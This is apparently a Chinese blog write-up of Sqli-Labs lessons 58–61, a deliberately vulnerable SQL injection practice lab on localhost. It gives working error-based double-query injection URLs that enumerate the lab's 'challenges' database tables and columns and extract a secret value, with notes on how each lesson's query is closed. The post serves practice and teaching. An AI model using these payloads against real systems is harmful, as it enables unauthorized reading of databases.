Sqli-Labs:Less 58 - Less 61

Less 58

基于错误_GET_单引号_字符型_双注入

http://localhost:8088/sqlilabs/Less-58/?id=1'

有报错回显就比较好办了,字符型单引号闭合。

http://localhost:8088/sqlilabs/Less-58/?id=1'--+

没过滤注释,可以看到回显的账号和往常的不一样,猜测是排序后输出的。

http://localhost:8088/sqlilabs/Less-58/?id=-1' union select 1,2,3--+

使用union注入时发现无论如何都会返回值,所以只能使用报错注入,这里采用双注入:

http://localhost:8088/sqlilabs/Less-58/?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),floor(rand()*2)) as a from information_schema.tables group by a--+

http://localhost:8088/sqlilabs/Less-58/?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5dzdwb17pb'),floor(rand()*2)) as a from information_schema.tables group by a--+

http://localhost:8088/sqlilabs/Less-58/?id=-1' union select 1,count(*),concat_ws('-',(select secret_ZV2Q from challenges.7ry9a67im6),floor(rand()*2)) as a from information_schema.tables group by a--+

注意:报错注入有可能会刷不出来报错信息,这在前面有提到过,可能是报错先后顺序的问题,不行就多尝试几次。

Less 59

基于错误_GET_数字型_双注入

http://localhost:8088/sqlilabs/Less-59/?id=1'

有报错回显,数字型无闭合。没过滤注释,使用双注入,同 Less 58。

Less 60

http://localhost:8088/sqlilabs/Less-60/?id=1"

有报错回显,字符型双引号加小括号闭合。没过滤注释,使用双注入,同 Less 58。

Less 61

http://localhost:8088/sqlilabs/Less-61/?id=1'

有报错回显,字符型单引号加两个小括号闭合。没过滤注释,使用双注入,同 Less 58。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容